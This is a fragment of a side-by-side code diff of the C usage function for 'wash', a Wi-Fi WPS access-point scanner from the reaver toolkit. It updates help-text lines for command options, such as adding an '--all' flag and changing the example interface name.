569 | 620 | fprintf(stderr, "\t-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [%d]\n", DEFAULT_MAX_NUM_PROBES); |
570 | 621 | fprintf(stderr, "\t-D, --daemonize Daemonize wash\n"); |
571 | fprintf(stderr, "\t-C, --ignore-fcs Ignore frame checksum errors\n"); | |
572 | 622 | fprintf(stderr, "\t-5, --5ghz Use 5GHz 802.11 channels\n"); |
573 | 623 | fprintf(stderr, "\t-s, --scan Use scan mode\n"); |
574 | 624 | fprintf(stderr, "\t-u, --survey Use survey mode [default]\n"); |
575 | fprintf(stderr, "\t-P, --output-piped Allows Wash output to be piped. Example. wash x|y|z...\n"); | |
625 | fprintf(stderr, "\t-P, --output-piped Allows Wash output to be piped. Example. wash x|y|z...\n"); | |
576 | 626 | fprintf(stderr, "\t-g, --get-chipset Pipes output and runs reaver alongside to get chipset\n"); |
627 | fprintf(stderr, "\t-a, --all Show all APs, even those without WPS\n"); | |
577 | 628 | fprintf(stderr, "\t-h, --help Show help\n"); |
578 | 629 | |
579 | 630 | fprintf(stderr, "\nExample:\n"); |
580 | fprintf(stderr, "\t%s -i mon0\n\n", prog); | |
631 | fprintf(stderr, "\t%s -i wlan0mon\n\n", prog); | |
581 | 632 | |
582 | 633 | return; |
583 | 634 | } |